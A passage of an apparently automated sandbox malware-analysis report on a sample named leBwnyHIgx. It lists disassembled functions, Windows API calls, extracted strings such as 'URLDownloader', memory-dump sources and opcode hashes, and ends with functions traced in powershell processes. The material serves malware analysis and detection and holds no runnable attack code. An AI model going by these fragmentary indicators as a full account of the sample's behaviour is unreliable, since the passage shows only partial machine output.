                                                                                    • Detected restart. Removing temporary directory., xrefs: 0065062B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                    • API String ID: 1717587489-3199836293
                                                                                    • Opcode ID: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction ID: 464bd2d836879dd3474a0288fef1e2a55e7a5b05e4adc84fe2957298e905eb94
                                                                                    • Opcode Fuzzy Hash: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction Fuzzy Hash: F1E0ABB52483402EF39137F6BC13A5B3F4EE7C7362F61043AFA0481441CC599864C138
                                                                                    Function 005B1C48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1C62
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                      • Part of subcall function 005B1BAC: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 1883125708-2676053874
                                                                                    • Opcode ID: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction ID: 9df0a5d5a98339ba50c13b8e37e12c07401c504aaeadd98406a6411a3d2f2949
                                                                                    • Opcode Fuzzy Hash: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction Fuzzy Hash: 6DF05C302B07109FD7416F659C44FD53EADFB44342F401924F504962A0C7F41C80C76C
                                                                                    Function 005B1CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005B1D88: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F,?,00000000,0064FA4C), ref: 005B1D10
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 1883125708-2866557904
                                                                                    • Opcode ID: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction ID: 40c05ee6389ba05014c80f0bb6a4273d02a3409cfaf78f9ef14993339606f823
                                                                                    • Opcode Fuzzy Hash: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction Fuzzy Hash: 14E0C2633A1E512E538072FA2CA1CEF088C9DA6A5A3900C36F505E3152D948DC02017D
                                                                                    Function 10015F82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(1001C31C,?,URLDownloader,?,100015AC,1001C6D4), ref: 10015F8D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015AC,1001C6D4), ref: 10015FC7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                    • String ID: URLDownloader
                                                                                    • API String ID: 17069307-1891997712
                                                                                    • Opcode ID: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                    • Instruction ID: 6adcf340ed2f6481699652d891028e0f11606ccd9733c9b7c4ba67a8641b8b52
                                                                                    • Opcode Fuzzy Hash: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                    • Instruction Fuzzy Hash: 24F08234500618DFD310DF18C884E1977A4EB49676F15423DE9698F291C731D982CA52
                                                                                    Function 005B09F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,005F8CBC,00000000,005F8D8E,?,?,0066978C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B0A0A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 1646373207-1816364905
                                                                                    • Opcode ID: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction ID: 6e2db57afe9603e13bbcb28d8d27c56aba657c1237ebb3fd90a72f709f2b52c2
                                                                                    • Opcode Fuzzy Hash: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction Fuzzy Hash: AEE0266178070013DB00A2BA4D83EEF158A5B94700F105C3D7999D62D2EDBCE88082A2
                                                                                    Function 00586704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMenu$Popup
                                                                                    • String ID: HOX
                                                                                    • API String ID: 257293969-2476314470
                                                                                    • Opcode ID: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction ID: 16515f4fc79d7f94603b2a7c1aa1a4c0f70e6e138b00580e915dac0b9c35f144
                                                                                    • Opcode Fuzzy Hash: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction Fuzzy Hash: F5F0C930604201CFDB00BF66D5C9B887B92BB55308F8454B9AC45AF25BD77488448FB1
                                                                                    Function 005B1BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 1646373207-2498399450
                                                                                    • Opcode ID: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction ID: 8c40f62a632f2fa97ec710fedad9e0295ca43648f38e841b9d187b64430073cf
                                                                                    • Opcode Fuzzy Hash: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction Fuzzy Hash: 5DE09A75220700DFD781AF64AC88FDA3FE9F708B01F002819F544921A0D6F818C0CA28
                                                                                    Function 005B1D88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: 2d118afa1acb73877a63b6e6f87aa342629fa191858680dbd20951d3b7f32472
                                                                                    • Instruction ID: cfd2a97203f557c8c57e6b3927d22065e7e78818251efbac2aa6542449ac9364
                                                                                    • Opcode Fuzzy Hash: 2d118afa1acb73877a63b6e6f87aa342629fa191858680dbd20951d3b7f32472
                                                                                    • Instruction Fuzzy Hash: 23D0A763351F222E179022F51EE1CEB068C9D242963440136FA00D2100D544DC4012AC
                                                                                    Function 00651170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: 03da989b8c341b0011cf5f2f54663901e78246e972d77ad5a530f748acd43f17
                                                                                    • Instruction ID: 5f29c36bf5ef2573be6bf32c1ba0481e8d956120234237a4d8ff77b8e3f328bd
                                                                                    • Opcode Fuzzy Hash: 03da989b8c341b0011cf5f2f54663901e78246e972d77ad5a530f748acd43f17
                                                                                    • Instruction Fuzzy Hash: C3B01265281F00310B7033F30F43FDB044A0C93B4BF0245D97F00D9092CD58C0490039

                                                                                    Executed Functions

                                                                                    Function 04A0B470 Relevance: .3, Instructions: 266COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 751f04922965391e0b2b7dec3fe4515881bf1686fecd8ba022893f242b335630
                                                                                    • Instruction ID: f46092caad06ad1eb0117a3fc38c8cc192e2bd66354b9e2b0ade548e737ab0b0
                                                                                    • Opcode Fuzzy Hash: 751f04922965391e0b2b7dec3fe4515881bf1686fecd8ba022893f242b335630
                                                                                    • Instruction Fuzzy Hash: EC91ADB5B007199BEF19EFB494105AEBBB2EF84700B00C969D512AF394DF34AE059BC5
                                                                                    Function 04A0B490 Relevance: .3, Instructions: 252COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 636333af7a975808825008a99eb19f7e15efa6c6a57f2b26f17d4f3de01c070a
                                                                                    • Instruction ID: ea9100fd3a407081bafe8795b3d1e22349800d045fe8d6029bdb19f133ba45d6
                                                                                    • Opcode Fuzzy Hash: 636333af7a975808825008a99eb19f7e15efa6c6a57f2b26f17d4f3de01c070a
                                                                                    • Instruction Fuzzy Hash: 06917CB5B007199BEF19EBB494015AFB7B2EF88700B00C92DD516AB394DF34AE059BC5
                                                                                    Function 077E2308 Relevance: 13.2, Strings: 10, Instructions: 660COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1715618775.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_77e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$JIl$JIl$JIl$JIl$JIl$JIl$rHl$rHl
                                                                                    • API String ID: 0-3516900390
                                                                                    • Opcode ID: eae477aa93d82da181af9328612b89d8af74d85ce81e0f1cacf0beefc72abfb7
                                                                                    • Instruction ID: 7cbd5ed69e410211637f0d00d9adc9df25bb4939829a20444bfe376d2024b4af
                                                                                    • Opcode Fuzzy Hash: eae477aa93d82da181af9328612b89d8af74d85ce81e0f1cacf0beefc72abfb7
                                                                                    • Instruction Fuzzy Hash: 78223AB1704609DFCB15DB68C441AAABBEDBF8D290F1484BAD905DF252DB31DC41CBA1
                                                                                    Function 04A0E5B9 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: JIl
                                                                                    • API String ID: 0-871223391
                                                                                    • Opcode ID: 61667eeae020a1d3c893fb9822969b45479e206cb9244c49b01bee5171710535
                                                                                    • Instruction ID: d07135995ef7226b0c7880a18534df74bf88cf12821ca1ec124331021ed64b00
                                                                                    • Opcode Fuzzy Hash: 61667eeae020a1d3c893fb9822969b45479e206cb9244c49b01bee5171710535
                                                                                    • Instruction Fuzzy Hash: CD41ADB4A002099FCB24DFB9E454A9EBBF1FF49304F108969D416AB390DB30BD45CB91
                                                                                    Function 04A06FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (xq
                                                                                    • API String ID: 0-3100309293
                                                                                    • Opcode ID: 87b7ec988303e6dc8742ab9817a194eec03abeeca941cb1b74339c84a12a2dfd
                                                                                    • Instruction ID: 5915e707f3e9dc782eee4371c58df85ae1f05c97f5e672334eed149838aa01f9
                                                                                    • Opcode Fuzzy Hash: 87b7ec988303e6dc8742ab9817a194eec03abeeca941cb1b74339c84a12a2dfd
                                                                                    • Instruction Fuzzy Hash: 45415E38B042048FDB15DFA8D458AAEBBF2EF8D714F148499D406AB394DB35EC01CB61
                                                                                    Function 04A0E610 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1703943312.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_4a00000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: JIl
                                                                                    • API String ID: 0-871223391
                                                                                    • Opcode ID: 91f07404001c3306810080f6f16b64e7ddb93e210fb2ec0fe5942d15bdc4cf81
                                                                                    • Instruction ID: 0b496c4fa2f49bfbdd5ba5b28b411b8a3faa8770a4ead172b468581ec0451c3b
